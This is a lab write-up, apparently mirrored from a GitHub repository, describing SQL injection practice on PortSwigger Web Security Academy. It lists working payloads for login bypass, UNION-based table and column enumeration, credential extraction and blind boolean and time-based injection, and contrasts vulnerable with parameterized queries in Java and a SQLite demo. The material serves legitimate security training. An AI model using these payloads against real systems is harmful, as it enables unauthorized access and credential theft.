## https://sploitus.com/exploit?id=EFBAB6E5-C4ED-5799-988B-C8C8D55B0B53
# SQL Injection Attack Lab - PortSwigger Web Security Academy
This repository documents my hands-on practice of exploiting SQL Injection vulnerabilities using PortSwigger Web Security Academy. It demonstrates how improper input handling can lead to serious database compromise.
---
## Overview
SQL Injection (SQLi) is a vulnerability that allows attackers to manipulate SQL queries by injecting malicious input. This can lead to authentication bypass, data leakage, and full database compromise.
This project covers authentication bypass, database enumeration (tables and columns), credential extraction, and HTTP request manipulation using Burp Suite.
---
## Root Cause of SQL Injection
SQL Injection occurs when user input is directly included in SQL queries without proper validation or sanitization.
### Vulnerable Query Example
```sql
SELECT * FROM users WHERE username = 'input' AND password = 'input';
```
### Malicious Input
```sql
' OR '1'='1
```
### Resulting Query
```sql
SELECT * FROM users WHERE username = '' OR '1'='1';
```
The condition `'1'='1'` is always TRUE, so the WHERE clause matches every row in `users` and the login check is bypassed.
---
## Tools Used
- Burp Suite (Proxy, Repeater, Intruder)
- Web Browser
- PortSwigger Web Security Academy
---
## Using Burp Suite as a Proxy
Burp Suite acts as an intercepting proxy between the browser and the server, so every HTTP request can be inspected and edited before it is forwarded.
### Steps Performed
1. Configure browser to use Burp Proxy
2. Intercept HTTP requests
3. Send to Repeater
4. Modify parameters (inject payloads)
5. Analyze responses
---
## SQL Injection Attacks Performed
### Authentication Bypass
Payload:
```sql
' OR 1=1--
```
Explanation:
Injected the payload into the login fields to bypass authentication.
---
### Extracting Database Tables
Payload:
```sql
' UNION SELECT table_name, NULL FROM information_schema.tables--
```
Explanation:
Enumerated the tables in the database and identified sensitive ones such as `users`.
---
### Extracting Column Names
Payload:
```sql
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--
```
Explanation:
Retrieved the column names of the `users` table, such as `username` and `password`.
---
### Extracting Credentials
Payload:
```sql
' UNION SELECT username, password FROM users--
```
Explanation:
Extracted the administrator credentials.
---
### HTTP Request Interception
Explanation:
Captured and modified HTTP requests using Burp Suite.
---
## Data Extraction Capabilities
- Database names
- Table names
- Column names
- User credentials
- Sensitive data
---
## Mistakes in Prepared Statements
Incorrect:
```java
// User input is concatenated into the query text, so a quote inside `user`
// ends the string literal and the rest of the input is parsed as SQL.
String query = "SELECT * FROM users WHERE username = '" + user + "'";
```
Correct:
```java
// The value is bound to a placeholder by the JDBC driver and is only ever
// treated as data, never as part of the statement.
PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE username = ?");
stmt.setString(1, user);
```
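As an added example (not part of this repository or the PortSwigger labs), the following Python script recreates the root-cause and prepared-statement sections above against a constructed in-memory SQLite table: the concatenated query accepts the bypass payloads shown on this page, while the parameterized query treats them as plain data. The table, the sample account and the function names are assumptions made for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample database (not lab data): a single user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('administrator', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the 'Incorrect' pattern: input is concatenated into the SQL
    text, so quotes and comment markers in the input rewrite the query."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Mirrors the 'Correct' pattern: placeholders are bound by the driver,
    so the input is only compared as a value and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Run both login checks on the same input; returns (vulnerable, safe)."""
    conn = make_db()
    try:
        return (login_vulnerable(conn, username, password),
                login_safe(conn, username, password))
    finally:
        conn.close()


if __name__ == "__main__":
    # Legitimate credentials succeed in both versions.
    print(compare("administrator", "s3cret"))  # ('administrator', 'administrator')
    # The bypass payload in the username field only fools the concatenated
    # query; the parameterized query finds no row with that literal name.
    print(compare("' OR 1=1--", "wrong"))      # ('administrator', None)
    # The root-cause payload placed in the password field behaves the same way.
    print(compare("anyone", "' OR '1'='1"))    # ('administrator', None)
```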
---
## Prevention Techniques
- Parameterized queries (prepared statements)
- Input validation
- Least privilege for the database account
- ORM frameworks
- Web application firewall (WAF)
---
## Blind SQL Injection (Overview)
Types:
- Boolean-based: the response differs depending on whether the injected condition is true or false
- Time-based: the response is delayed when the injected condition is true
Payloads:
```sql
' AND 1=1--
' AND 1=2--
' AND SLEEP(5)--
```
The first two payloads are the boolean-based pair; the third is time-based and uses the MySQL `SLEEP()` function.
---
## Cluster Bomb Attack (Burp Intruder)
Steps:
1. Send request to Intruder
2. Mark positions
3. Add payload sets
4. Select Cluster Bomb
5. Analyze responses
---
## Key Learnings
- SQL Injection can lead to full database compromise
- Small coding mistakes have a large impact
- Burp Suite is essential for this kind of testing
- Secure coding is critical
---
## Disclaimer
All testing performed in PortSwigger Web Security Academy labs for educational purposes only.